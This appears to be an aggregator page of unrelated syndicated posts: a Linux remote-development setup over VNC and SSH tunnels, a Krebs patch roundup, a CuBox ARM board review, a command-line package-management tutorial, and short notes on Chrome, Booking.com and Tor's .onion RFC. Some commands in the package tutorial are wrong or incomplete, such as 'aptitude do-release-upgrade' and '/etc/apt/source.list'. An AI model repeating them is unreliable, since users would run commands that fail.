Promoting aesthetics over content seems to go against the purpose of a search engine; users search for content and not styling. Normalizing content layout contracts the purpose of having configurable layouts. Giving developers less than two months to make major changes seems out of touch with reality. And requiring design choices that favor the dominant company’s strict views seems very anti-competitive to me.

Many web sites depend on search engines like Google for income — either directly through ads or indirectly through visibility. This recent change at Google will dramatically impact many web sites — sites with solid content but, according to Google, less desirable layouts. Moreover, it forces companies to comply with Google’s requirements or lose future revenue.

Google has a long history of questionable behavior. This includes multiple lawsuits against Google for anti-competitive behavior and privacy violations. However, each of these cases are debatable. In contrast, I think that this requirement for site layout compliance is the first time that the “do no evil” company has explicitly gone evil in a non-debatable way.

Linux How-Tos and Linux Tutorials: How to Configure Your Dev Machine to Work From Anywhere (Part 3)

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jeff Cogswell. Original post: at Linux How-Tos and Linux Tutorials

In the previous articles, I talked about my mobile setup and how I’m able to continue working on the go. In this final installment, I’ll talk about how to install and configure the software I’m using. Most of what I’m talking about here is on the server side, because the Android and iPhone apps are pretty straightforward to configure.

Before we begin, however, I want to mention that this setup I’ve been describing really isn’t for production machines. This should only be limited to development and test machines. Also, there are many different ways to work remotely, and this is only one possibility. In general, you really can’t beat a good command-line tool and SSH access. But in some cases, that didn’t really work for me. I needed more; I needed a full Chrome JavaScript debugger, and I needed better word processing than was available on my Android tablets.

Here, then, is how I configured the software. Note, however, that I’m not writing this as a complete tutorial, simply because that would take too much space. Instead, I’m providing overviews, and assuming you know the basics and can google to find the details. We’ll take this step by step.

Spin up your server

First, we spin up the server on a host. There are several hosting companies; I’ve used Amazon Web Services, Rackspace, and DigitalOcean. My own personal preference for the operating system is Ubuntu Linux with LXDE. LXDE is a full desktop environment that includes the OpenBox window manager. I personally like OpenBox because of its simplicity while maintaining visual appeal. And LXDE is nice because, as its name suggests (Lightweight X11 Desktop Environment), it’s lightweight. However, many different environments and window managers will work. (I tried a couple tiling window managers such as i3, and those worked pretty well too.)

The usual order of installation goes like this: You use the hosting company’s website to spin up the server, and you provide a key file that will be used for logging into the server. You can usually use your own key that you generate, or have the service generate a key for you, in which case you download the key and save it. Typically when you provide a key, the server will automatically be configured to log in only using SSH with the key file. However, if not, you’ll want to follow disable password logins.

Connect to the server

The next step is to actually log into the server through an SSH command line and first set up a user for yourself that isn’t root, and then set up the desktop environment. You can log in from your desktop Linux, but if you like, this is a good chance to try out logging in from an Android or iOS tablet. I use JuiceSSH; a lot of people like ConnectBot. And there are others. But whichever you get, make sure it allows you to log in using a key file. (Key files can be created with or without a password. Also make sure the app you use allows you to use whichever key file type you created–password or no password.)

Copy your key file to your tablet. The best way is to connect the tablet to your computer, and transfer the file. However, if you want a quick and easy way to do it, you can email it. But be aware that you’re sending the private key file through an email system that other people could potentially access. It’s your call whether you want to do that. Either way, get the file installed on the tablet, and then configure the SSH app to log in using the key file, using the app’s instructions.

Then using the app, connect to your server. You’ll need the username, even though you’re using a key file (the server needs to know who you’re logging in as with the key file, after all); AWS typically uses “ubuntu” for the username for Ubuntu installations; others simply give you the root user. For AWS, to do the installation you’ll need to type sudo before each command since you’re not logged in as root, but won’t be asked for a password when running sudo. On other cloud hosts you can run the commands without sudo since you’re logged in as root.

Oh and by the way, because we don’t yet have a desktop environment, you’ll be typing commands to install the software. If you’re not familiar with the package installation tools, now is a chance to learn about them. For Debian-based systems (including Ubuntu), you’ll use apt-get. Other systems use yum, which is a command-line interface to the RPM package manager.

Install LXDE

From the command-line, it’s time to set up LXDE, or whichever desktop you prefer. One thing to bear in mind is that while you can run something big like Cinnamon, ask yourself if you really need it. Cinnamon is big and cumbersome. I use it on my desktop, but not on my hosted servers, opting instead for more lightweight desktops like LXDE. And if you’re familiar with desktops such as Cinnamon, LXDE will feel very similar.

There are lots of instructions online for installing LXDE or other desktops, and so I won’t reiterate the details here. DigitalOcean has a fantastic blog with instructions for installing a similar desktop, XFCE.

Install a VNC server

Then you need to install a VNC server. Instead of using TightVNC, which a lot of people suggest, I recommend vnc4server because it allows for easy resolution changes, as I’ll describe shortly.

While setting up the VNC server, you’ll create a VNC username. You can just use a username and password for VNC, and from there you’re able to connect from a VNC client app to the system. However, the connection won’t be secure. Instead, you’ll want to connect through what’s called an SSH tunnel. The SSH tunnel is basically an SSH session into the server that is used for passing connections that would otherwise go directly over the internet.

When you connect to a server over the Internet, you use a protocol and a port. VNC usually uses 5900 or 5901 for the port. But with an SSH tunnel, the SSH app listens on a port on the same local device, such as 5900 or 5901. Then the VNC app, instead of connecting to the remote server, connects locally to the SSH app. The SSH app, in turn, passes all the data on to the remote system. So the SSH serves as a go-between. But because it’s SSH, all the data is secure.

So the key is setting up a tunnel on your tablet. Some VNC apps can create the tunnel; others can’t and you need to use a separate app. JuiceSSH can create a tunnel, which you can use from other apps. My preferred VNC app, Remotix, on the other hand, can do the tunnel itself for you. It’s your choice how you do it, but you’ll want to set it up.

The app will have instructions for the tunnel. In the case of JuiceSSH, you specify the server you’re connecting to and the port, such as 5900 or 5901. Then you also specify the local port number the tunnel will be listening on. You can use any available port, but I’ll usually use the same port as the remote one. If I’m connecting to 5901 on the remote, I’ll have JuiceSSH also listen on 5901. That makes it easier to keep straight. Then you’ll open up your VNC app, and instead of connecting to a remote server, you connect to the port on the same tablet. For the server you just use 127.0.0.1, which is the IP address of the device itself. So to re-iterate:

  1. JuiceSSH connects, for example, to 5901 on the remote host. Meanwhile, it opens up 5901 on the local device.
  2. The VNC app connects to 5901 on the local device. It doesn’t need to know anything about what remote server it’s connecting to.

But some VNC apps don’t need another app to do the tunneling, and instead provide the tunnel themselves. Remotix can do this; if you set up your app to do so, make sure you understand that you’re still tunneling. You provide the information needed for the SSH tunnel, including the key file and username. Then Remotix does the rest for you.

Once you get the VNC app going, you’ll be in. You should see a desktop open with the LXDE logo in the background. Next, you’ll want to go ahead and configure the VNC client to your liking; I prefer to control the mouse using drags that simulate a trackpad; other people like to control the mouse by tapping exactly where you want to click. Remotix and several other apps let you choose either configuration.

Configuring the Desktop

Now let’s configure the desktop. One issue I had was getting the desktop to look good on my 10-inch tablet. This involved configuring the look and feel by clicking the taskbar menu < Preferences < Customize Look and Feel (or run from the command line lxappearance).

lxappearance

I also used OpenBox’s own configuration tool by clicking the taskbar menu < Preferences < OpenBox Configuration Manager (or runobconf).

obconf

My larger tablet’s screen isn’t huge at 10 inches, so I configured the menu bars and buttons and such to be somewhat large for a comfortable view. One issue is the tablet has such a high resolution that if I used the maximum resolution, everything was tiny. As such, I needed to be able to change resolutions based on the work I was doing, as well as based on which tablet I was using. This involved configuring the VNC server, though, not LXDE and OpenBox. So let’s look at that.

In order to change resolution on the fly, you need a program that can manage the RandR extensions, such as xrandr. But the TightVNC server that seems popular doesn’t work with RandR. Instead, I found the vvnc4server program works with xrandr, which is why I recommend using it instead. When you configure vnc4server, you’ll want to provide the different resolutions in the command’s -geometry option. Here’s an init.d service configuration file that does just that. (I modified this based on one I found on DigitalOcean’s blog.)

#!/bin/bash
PATH="$PATH:/usr/bin/"
export USER="jeff"
OPTIONS="-depth 16 -geometry 1920x1125 -geometry 1240x1920 -geometry 2560x1500 -geometry 1920x1080 -geometry 1774x1040 -geometry 1440x843 -geometry 1280x1120 -geometry 1280x1024 -geometry 1280x750 -geometry 1200x1100 -geometry 1024x768 -geometry 800x600 :1"
. /lib/lsb/init-functions
case "$1" in
start)
log_action_begin_msg "Starting vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vnc4server ${OPTIONS}"
;;
stop)
log_action_begin_msg "Stoping vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vnc4server -kill :1"
;;
restart)
$0 stop
$0 start
;;
esac
exit 0

The key here is the OPTIONS line with all the -geometry options. These will show up when you run xrandr from the command line:

xrandr.png

You can use your VNC login to modify the file in the init.d directory (and indeed I did, using the editor called scite). But then after making these changes, you’ll need to restart the VNC service just this one time, since you’re changing its service settings. Doing so will end your current VNC session, and it might not restart correctly. So you might need to log in through JuiceSSH to restart the VNC server. Then you can log back in with the VNC server. (You also might need to restart the SSH tunnel.) After you do, you’ll be able to configure the resolution. And from then on, you can change the resolution on the fly without restarting the VNC server.

To change resolutions without having to restart the VNC server, just type:

xrandr -s 1

Replace 1 with the number for the resolution you want. This way you can change the resolution without restarting the VNC server.

Server Concerns

After everything is configured, you’re free to use the software you’re familiar with. The only catch is that hosts charge a good bit for servers that have plenty of RAM and disk space. As such, you might be limited on what you can run based on the amount of RAM and cores. Still, I’ve found that with just 2GB of RAM and 2 cores, with Ubuntu and LXDE, I’m able to have open Chrome with a few pages, LibreOffice with a couple documents open, Geany for my code editing, and my own server software running under node.js for testing, and mysql server. Occasionally if I get too many Chrome tabs open, the system will suddenly slow way down and I have to shut down tabs to free up more memory. Sometimes I run MySQL Workbench and it can bog things down a bit too, but it isn’t bad if I close up LibreOffice and leave only one or two Chrome tabs open. But in general, for most of my work, I have no problems at all.

And on top of that, if I do need more horsepower, I can spin up a bigger server with 4GB or 8GB and four cores or eight cores. But that gets costly and so I don’t do it for too many hours.

Multiple Screens

For fun, I did manage to get two screens going on a single desktop, one on my bigger 10-inch ASUS transformer tablet, and one on my smaller Nexus 7 all from my Linux server running on a public cloud host, complete with a single mouse moving between the two screens. To accomplish this, I started two VNC sessions, one from each tablet, and then from the one with the mouse and keyboard, I ran:

x2x -east -to :1

This basically connected the single mouse and keyboard to both displays. It was a fun experiment, but in my case, provided little practical value because it wasn’t like a true dual-display on a desktop computer. I couldn’t move slide windows between the displays, and the Chrome browser won’t open under more than one X display. In my case, for web development, I wanted to be able to open up the Chrome browser on one tablet, and then the Chrome JavaScript debug window on the other, but that didn’t work out.

Instead, what I found more useful was to have an SSH command-line shell on the smaller tablet, and that’s where I would run my node.js server code, which was printing out debug information. Then on the other I would have the browser running. That way I can glance back and forth without switching between windows on the single VNC login on the bigger tablet.

Back to Security

I can’t understate the importance of making sure you have your security set up and that you understand how the security works and what the ramifications are. I highly recommend using SSH with a keyfile login only, and no password logins allowed. And treat this as a development or test machine; don’t put customer data on the machine that could open you up to lawsuits in the event the machine gets compromised.

Instead, for production machines, allocate your production servers using all the best practices laid out by your own IT department security rules, and the host’s own rules. One issue I hit is my development machine needs to log into git, which requires a private key. My development machine is hosted, which means that private key is stored on a hosted server. That may or may not be a good idea in your case; you and your team will need to decide whether to do it. In my case, I decided I could afford the risk because the code I’m accessing is mostly open-source and there’s little private intellectual property involved. So if somebody broke into my development machine, they would have access to the source code for a small but non-vital project I’m working on, and drafts of these articles–no private or intellectual data.

Web Developers and A Pesky Thing Called Windows

Before I wrap this up, I want to present a topic for discussion. Over the past few years I’ve noticed that a lot of individual web developers use a setup quite similar to what I’m describing. In a lot of cases they use Windows instead of Linux, but the idea is the same regardless of operating system. But where they differ from what I’m describing is they host their entire customer websites and customer data on that one machine, and there is no tunneling; instead, they just type in a password. That is not what I’m advocating here. If you are doing this, please reconsider. (I personally know at least three private web developers who do this.)

Regardless of operating systems, take some time to understand the ramifications here. First, by logging in with a full desktop environment, you’re possibly slowing down your machine for your dev work. And if you mess something up and have to reboot, during that time your clients’ websites aren’t available during that time. Are you using replication? Are you using private networking? Are you running MySQL or some other database on the same machine instead of using virtual private networking? Entire books could (and have been) written on such topics and what the best practices are. Learn about replication; learn about virtual private networking and how to shield your database servers from outside traffic; and so on. And most importantly consider the security issues. Are you hosting customer data in a site that could easily be compromised? That could spell L-A-W-S-U-I-T. And that brings me to my conclusion for this series.

Concluding Remarks

Some commenters on the previous articles have brought up some valid points; one even used the phrase “playing.” While I really am doing development work, I’m definitely not doing this on production machines. If I were, that would indeed be playing and not be a legitimate use for a production machine. Use SSH for the production machines, and pick an editor to use and learn it. (I like vim, personally.) And keep the customer data on a server that is accessible only from a virtual private network. Read this to learn more.

Learn how to set up and configure SSH. And if you don’t understand all this, then please, practice and learn it. There are a million web sites out there to teach this stuff, including linux.com. But if you do understand and can minimize the risk, then, you really can get some work done from nearly anywhere. My work has become far more productive. If I want to run to a coffee shop and do some work, I can, without having to take a laptop along. Times are good! Learn the rules, follow the best practices, and be productive.

See the previous tutorials:

How to Set Up Your Linux Dev Station to Work From Anywhere

Choosing Software to Work Remotely from Your Linux Dev Station

Darknet - The Darkside: Google Chrome 42 Stomps A LOT Of Bugs & Disables Java By Default

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

Ah finally, the end of NPAPI is coming – a relic from the Netscape era the Netscape Plugin API causes a lot of instability in Chrome and security issues. It means Java is now disabled by default along with other NPAPI based plugins in Google Chrome 42. Chrome will be removing support for NPAPI totally […]

The post Google Chrome 42 Stomps…

Read the full post at darknet.org.uk

Krebs on Security: Critical Updates for Windows, Flash, Java

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Get your patch chops on people, because chances are you’re running software from Microsoft, Adobe or Oracle that received critical security updates today. Adobe released a Flash Player update to fix at least 22 flaws, including one flaw that is being actively exploited. Microsoft pushed out 11 update bundles to fix more than two dozen bugs in Windows and associated software, including one that was publicly disclosed this month. And Oracle has an update for its Java software that addresses at least 15 flaws, all of which are exploitable remotely without any authentication.

brokenflash-aAdobe’s patch includes a fix for a zero-day bug (CVE-2015-3043) that the company warns is already being exploited. Users of the Adobe Flash Player for Windows and Macintosh should update to Adobe Flash Player 17.0.0.169 (the current versions other OSes is listed in the chart below).

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version 17.0.0.169.

Google has an update available for Chrome that fixes a slew of flaws, and I assume it includes this Flash update, although the Flash checker pages only report that I now have version 17.0.0 installed after applying the Chrome update and restarting (the Flash update released last month put that version at 17.0.0.134, so this is not particularly helpful). To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

brokenwindowsMicrosoft has released 11 security bulletins this month, four of which are marked “critical,” meaning attackers or malware can exploit them to break into vulnerable systems with no help from users, save for perhaps visiting a booby-trapped or malicious Web site. Then Microsoft patches fix flaws in Windows, Internet Explorer (IE), Office, and .NET

The critical updates apply to two Windows bugs, IE, and Office. .NET updates have a history of taking forever to apply and introducing issues when applied with other patches, so I’d suggest Windows users apply all other updates, restart and then install the .NET update (if available for your system).

Oracle’s quarterly “critical patch update” plugs 15 security holes. If you have Java installed, please update it as soon as possible. Windows users can check for the program in the Add/Remove Programs listing in Windows, or visit Java.com and click the “Do I have Java?” link on the homepage. Updates also should be available via the Java Control Panel or fromJava.com.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. In the past, updating via the control panel auto-selected the installation of third-party software, so be sure to look for any pre-checked “add-ons” before proceeding with an update through the Java control panel. Also, Java 7 users should note that Oracle has ended support for Java 7 after this update. The company has been quietly migrating Java 7 users to Java 8, but if this hasn’t happened for you yet and you really need Java installed in the browser, grab a copy of Java 8. The recommended version is Java 8 Update 40.

javamessOtherwise, seriously consider removing Java altogether. I have long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, there is a way to have this program installed while minimizing the chance that crooks will exploit unknown or unpatched flaws in the program: unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play, which can block Web sites from displaying both Java and Flash content by default). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Many people confuse Java with  JavaScript, a powerful scripting language that helps make sites interactive. Unfortunately, a huge percentage of Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. For more about ways to manage JavaScript in the browser, check out my tutorial Tools for a Safer PC.

Linux How-Tos and Linux Tutorials: The CuBox: Linux on ARM in Around 2 Inches Cubed

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

cuboxThe CuBox is a 2-inch cubed ARM machine that can be used as a set-top box, a small NAS or database server, or in many other interesting applications. In my ongoing comparison of ARM machines, including the BeagleBone Black, Cubieboard, and others, the CuBox has the fastest IO performance for SSD that I’ve tested so far.

There are a few models and some ways to customize each model giving you the choice between double or quad cores, if you need 1 or 2 gigabytes of RAM, if 100 megabit ethernet is fine or you’d rather have gigabit ethernet, and if wifi and bluetooth are needed. This gives you a price range from $90 to $140 depending on which features you’re after. We’ll take a look at the CuBox i4Pro, which is the top-of-the-line model with all the bells and whistles.

CuBox Features

Most of the connectors on the CuBox are on the back side. The connectors include gigabit ethernet, two USB 2.0 ports, a full sized HDMI connector, eSATA, power input, and a microSD slot. Another side of the CuBox also features an Optical S/PDIF Audio Out. The power supply is a 5 Volt/3 Amp unit and connects using a DC jack input on the CuBox.

One of the first things I noticed when unpacking the CuBox is that it is small, coming in at 2 by 2 inches in length and width and around 1 and 3/4 inches tall. To contrast, a Raspberry Pi 2 in a case comes out at around 3.5 inches long and just under but close to 2.5 inches wide. The CuBox stands taller on the table than the Raspberry Pi.

When buying the CuBox you can choose to get either Android 4.4 or OpenELEC/XBMC on your microSD card. You can also install Debian, Fedora, openSUSE, and others, when it arrives.

The CuBox i4Pro had Android 4.4.2 pre-installed. The first boot up sat at the “Android” screen for minutes, making me a little concerned that something was amiss. After the delay you are prompted to select the app launcher that you want to use and then you’re in business. A look at the apps that are available by default shows Google Keep and Drive as well as the more expected apps like Youtube, Gmail, and the Play Store. The YouTube app was recent enough to include an option to Chromecast the video playback. Some versions of Android distributed with small ARM machines do not come with the Play Store by default, so it’s good to see it here right off the bat.

One app that I didn’t expect was the Ethernet app. This lets you check what IP address, DNS settings, and proxy server, if any, are in use at the moment. You can also specify to use DHCP (the default) or a static IP address and nominate a proxy server as well as a list of machines that the CuBox shouldn’t use the proxy to access.

When switching applications the graphical transitions were smooth. The mouse wheel worked as expected in the App/Widgets screen, the settings menu, and the YouTube app. The Volume +/- keys on a multimedia keyboard changed the volume but only in increments of fully on or fully off. That might not be an issue if you are controlling the volume with your television or amp instead of the CuBox. Playback in the YouTube app was smooth and transitioned to full screen playback without any issues.

The Chrome browser (version 31.0.1650.59) got 2,445 overall for the Octane 2.0 benchmark. To contrast, on a 3-year-old Mac Air, Chrome (version 41.0.2272.89) got 13,542 overall.

Installing Debian

The microSD card does not have a spring loading in the CuBox. So to remove the microSD card you have to use your fingernail to carefully prise it out of the slot.

Switching to Debian can be done by downloading the image and using a command like the one below to copy that image to a microSD card. I kept the original card and used a new, second microSD card to write Debian onto so I could easily switch between Debian and Android. Once writing is done, slowly prise out the original microSD card and insert the newly created Debian microSD card.

dd if=Cubox-i_Debian_2.6_wheezy_3.14.14.raw 
   of=/dev/disk/by-id/this-is-where-my-microsdcard-is-at 
   bs=1048576

There is also support for installing and running a desktop on your CuBox/Debian setup. That extends to experimental support for accelerated GPU and VPU on the CuBox. On my Debian installation, I tried to hardware decode the Big Buck Bunny but it seems some more tinkering is needed to get hardware decode working. Using the “GeexBox XBMC ‐ A Kodi Media Center” version 3.1 distribution the Big Buck Bunny file played fine, so hardware decoding is supported by the CuBox, it just might take a little more tinkering to get at it if you want to run Debian.

The Debian image boots to a text console by default. This is easily overcome by installing a desktop environment, I found that Xfce worked well on the CuBox.

CuBox Performance.

Digging around in /sys one should find the directory /sys/devices/system/cpu/cpu0/cpufreq which contains interesting files like cpuinfo_cur_freq and cpuinfo_max_freq. For me these showed about 0.8 Gigahertz and 1.2 Ghz respectively.

The OpenSSL benchmark is a single core test. Some other ARM machines like the ODroid-XU are clocked much faster than the CuBox, which will have an impact on the OpenSSL benchmark.

Compiling OpenSSL 1.0.1e on four cores took around 6.5 minutes. Performance for digest and ciphers was in a similar ballpark to the BeagleBone Black. For 1,024 bit RSA signatures the CuBox beat the BeagleBone Black at 200 to 160 respectively.

Cubox ciphers

Cubox digests

cubox rsa sign

Iceweasel 31.5 gets an octane of 2,015. For comparison, Iceweasel 31.4.0esr-1 on the Raspberry Pi 2 got an overall Octane score of 1,316.

To test 2Dgraphics performance I used version 1.0.1 of the Cairo Performance Demos. The gears test runs three turning gears; the chart runs four line graphs; the fish is a simulated fish tank with many fish swimming around; gradient is a filled curved edged path that moves around the screen; and flowers renders rotating flowers that move up and down the screen. For comparison I used a desktop machine running an Intel 2600K CPU with an NVidia GTX 570 card which drives two screens, one at 2560 x 1440 and the other at 1080p.

Test Radxa 
at 1080
Beable Bone 
Black at 720
Mars 
LVDS at 768
desktop 2600k/nv570 
two screens
Raspberry Pi 2 
at 1080
CuBox i4Pro 
at 1080

gears

29

26

18

140

21.5

15.25

chart

3

2

2

16

1.7

3.1

fish

3

4

0.3

188

1.6

2

gradient

12

10

17

117

9.6

9.7

eSATA

The CuBox also features an eSATA port, freeing you from microSD cards by making the considerably faster SSD storage available. The eSATA port, multi cores, and gigabit ethernet port make the CuBox and an external 2.5-inch SSD an interesting choice for a small NAS.

I connected a 120 GB SanDisk Extreme SSD to test the eSATA performance. For sequential IO Bonnie++ could write about 120 megabit/ second and read 150 mb/s and rewrite blocks at about 50 mb/s. Overall 6,000 seeks/second were able to be done.

For price comparison, a 120 GB SanDisk SSD currently goes for about $70 while a 128 GB SanDisk microSD card is around $100. The microSD card packaging mentions up to 48mb/s transfer rates. This is without considering that the SSD should perform better for server loads and times when there are data rewrites such as on database servers.

For comparison this is the same SSD I used when reviewing the Cubieboard. Although the CuBox and Cubieboard have similar sounding names they are completely different machines. Back then I found that the Cubieboard could write about 41 mb/s and read 104 mb/s back from it with 1849 seeks/s performed. The same SSD again on the TI OMAP5432 got 66 ms/s write, 131 mb/s read and could do 8558 seeks/s. It is strange that the CuBox can transfer more data to and from the drive than the TI OMAP5432 but the OMAP5432 has better seek performance.

As far as eSATA data transfer goes, the CuBox is the ARM machine with the fastest IO performance for this SSD I have tested so far.

Power usage

At an idle graphical login with a mouse and keyboard plugged in, the CuBox drew 3.2 Watts. Disconnecting the keyboard and mouse dropped power to 2.8 W. With the keyboard and mouse reconnected for the remainder of the readings, running a single instance of OpenSSL speed that jumped to 4 W. Running four OpenSSL speed tests at once power got up to 6.3 W. When running Octane the power ranged up to 5 W on occasion.

Final Words

While the smallest ARM machines try to directly attach to an HDMI port, if you plan to add a realistic amount of connections to the CuBox such as power, ethernet, and some USB cables then the HDMI dongle form factor becomes a disadvantage. Instead, the CuBox opts to have (almost) all the connectors coming out of one side of the machine and to make that machine extremely small.

Being able to select from three base machines, and configure if you want (and want to pay for) wifi and bluetooth lets you customize the machine for the application you have in mind. The availability of eSATA and a gigabit ethernet connection allow the CuBox to be a small server — be that a NAS or a database server. The availability of two XBMC/Kodi disk images offering hardware video decoding also makes the CuBox an interesting choice for media playback.

We would like to thank SolidRun for supplying the CuBox hardware used in this review.

Linux How-Tos and Linux Tutorials: How to Use the Linux Command Line: Software Management

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

ubuntu apt

In the previous article of this series we learned some of the basics of the CLI (command line interface). In this article, we will learn how to manage software on your distro using only the command line, without touching the GUI at all.

I see great benefits when using the command line in any Ubuntu-based system. Each *buntu comes with its own ‘custom’ software management tool which not only creates inconsistent experiences across different flavors, even if they use the same repositories or resources to manage software. The life of a user becomes easier with CLI because the same command works across flavors and derivatives. So if you are a Kubuntu user you won’t have a problem supporting a Linux Mint user because CLI will remove all the confusing wrappers. In this tutorial I am targeting all major distros: Debian/Ubuntu, openSUSE and Fedora.

Debian/Ubuntu: How to update repositories and install packages

There are two command line tools for the Debian family: ‘apt-get’ and ‘aptitude’. Aptitude is considered a superior tool as it does a better job at dependencies and better management of packages. If Ubuntu doesn’t come with ‘aptitude’ pre-installed, I suggest you install the tool.

Before we install any package we must always update the repositories so that they can pull the latest information about the packages. This is not limited to Ubuntu. Irrespective of the distro you use, you must always update the repositories before installing packages or running system updates.The command to update packages is:

sudo apt-get update

Once the repositories are updated you can install ‘aptitude’. The pattern is simple sudo apt-get install

sudo apt-get install aptitude

Ubuntu comes pre-installed with a bash-completion tool which makes life even easier with apt-get and aptitude. You don’t have to remember the complete name of the package, just type the first three letters and hit ‘Tab’ key. Bash will offer you all the packages starting with those three letters. So if I type ‘sudo apt-get install apt’ and then hit ‘Tab’ it will show me a long list of such packages.

Once aptitude is installed, you should start using it instead of apt-get. The usage is same, just replace apt-get with aptitude.

Run system update/upgrades

Running a system upgrade is quite easy on Ubuntu and its derivatives. The command is simple:

sudo aptitude update
sudo aptitude upgrade

There is another command for system upgrades called ‘dist-upgrade’. This command is a bit more advanced than the simple ‘upgrade’ command because it performs some extra tasks. While the ‘upgrade’ command only upgrades the installed packages to its newest version, it doesn’t remove any older packages. ‘Dist-upgrade’ on the other hand also handles dependency changes and may remove packages not needed anymore. Also if you want to upgrade the Linux kernel to the latest version then you need the ‘dist-upgrade’ command. You can run the following command:

sudo aptitude update
sudo aptitude dist-upgrade

Upgrade to latest version of Ubuntu

It’s extremely easy to upgrade the official flavors of Ubuntu (such as Ubuntu, Kubuntu, Xubuntu, etc.) from one major version to another. Just keep in mind that it should be from one release to the next release, for example from 14.04 to 14.10 and not from 13.04 to 14.04. The only exception are the LTS releases as you can jump from one LTS to another. In order to run an upgrade you may have to install an additional package:

sudo aptitude install update-manager-core 

Now run the following command to do the release upgrade:

sudo aptitude do-release-upgrade

While upgrading from one release to another keep in mind that while almost all official Ubuntu-flavors support such upgrades, it may not work on unofficial flavors or derivatives like Linux Mint or elementary OS. You much check the official forums of those distros before attempting an upgrade.

Another important point to keep in mind is that you must always back-up data before running a distribution upgrade and also run a repository update, then dist-upgrade.

How to remove packages

It’s very easy to remove packages via the command line. Just use the ‘remove’ option instead of ‘install’. So if you want to remove ‘firefox’, the command would be:

sudo aptitude remove firefox

If you want to also remove the configuration files related to that package, for a fresh restart or to trim down your system then you can use the ‘purge’ option:

sudo aptitude purge firefox

To further clean your system and get rid of packages no longer needed, you must run ‘auto remove’ command from time to time:

sudo apt-get autoremove

Installing binary packages

At times, many developers and companies offer their software as executable binaries or .deb files. To install such packages you need a different command tool called dpkg.

sudo dpkg -i /path-of-downloaded.deb

At times you may come across broken package error in *buntus. You can check any broken packages by running this command:

sudo apt-get check

If there are any broken packages then you can run this command to fix them:

sudo apt-get -f install

How to add or remove repositories or PPAs

All repositories are saved at this location: ‘/etc/apt/source.list’. You can simply edit this file using ‘nano’ or your preferred editor and add the new repositories there. In order to add new PPAs (personal package archives) to the system use the following pattern:

sudo add-apt-repository ppa:

For example if you want to add LibreOffice PPA this would be the pattern:

sudo add-apt-repository ppa:libreoffice/ppa

openSUSE Software management

Once you understand how basic Linux commands work, it really won’t matter which distro you are using. And that also makes it easier to hop distros so that you can become distro agnostic, refrain from tribalism and use the distro that works the best for you. If you are using openSUSE then ‘apt-get’ or ‘aptitude’ is replaced by ‘zypper’.

opensuse cli

Let’s run a system update. First you need to refresh the repository information:

sudo zypper refresh

Then run a system update:

sudo zypper up

Alternatively you can also use:

sudo zypper update

This command will upgrade all packages to their latest version. To install any package the command is:

sudo zypper in [package-name]

However you must, as usual, refresh the repositories before installing any package:

sudo zypper refresh

To uninstall any package run:

sudo zypper remove

However, unlike Ubuntu or Arch Linux the default shell of openSUSE doesn’t do a great job at auto-completion when it comes to managing packages. That’s where another shell ‘zsh’ comes into play. You can easily install zsh for openSUSE (chances are that it’s already installed.)

sudo zypper in zsh

To use zsh just type zsh in the terminal and follow instructions to configure it. You can also change the default shell from ‘bash’ to ‘zsh’ by editing the ‘/etc/passwd’ file.

sudo nano /etc/passwd

Then replace ‘bash’ with ‘zsh’ for the user and root. Once it’s all set it will be much more pleasant to use the command line in openSUSE.

How to add new repositories in openSUSE

It’s very easy to add a repo to openSUSE. The pattern is easy:zypper ar -f

So if I want to add a Gnome this would be the command:

zypper ar -f obs://GNOME:STABLE:3.8/openSUSE_12.3 GS38

[It’s only an example, using an older Gnome repo, don’t try it on your system.]

How to install binaries in openSUSE

In openSUSE you can use the same ‘zypper install’ command to install binaries. So if you want to install Google Chrome, you can download the .rpm file from the site and then run this command:

sudo zypper install

How to install packages in fedora

fedora cliFedora uses ‘yum’ which is the counterpart of ‘apt-get’ and ‘zypper’. To find updates and install them in Fedora run

sudo yum update

To install any package simply run:

sudo yum install

To remove any package run:

sudo yum remove

To install binaries use:

sudo yum install

So, that’s pretty much all that you need to get started using command line for software management in these distros.

 

Чорба от греховете на dzver: Booking.com

This post was syndicated from: Чорба от греховете на dzver and was written by: dzver. Original post: at Чорба от греховете на dzver

Screenshot 2015-04-05 20.29.34

Здрасти ,

След двудневни мъки и след като се отказах от Chrome успях да логна в акаунта си в booking.com.
:-)

Errata Security: The .onion address

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

A draft RFC for Tor’s .onion address is finally being written. This is a proper thing. Like the old days of the Internet, people just did things, then documented them later. Tor’s .onion addresses have been in use for quite a while (I just setup another one yesterday). It’s time that we documented this for the rest of the community, to forestall problems like somebody registering .onion as a DNS TLD.

One quibble I have with the document is section 2.1, which says:

1. Users: human users are expected to recognize .onion names as having different security properties, and also being only available through software that is aware of onion addresses.

This certain documents current usage, where Tor is a special system run separately from the rest of the Internet. However, it appears to deny a hypothetical future were Tor is more integrated.
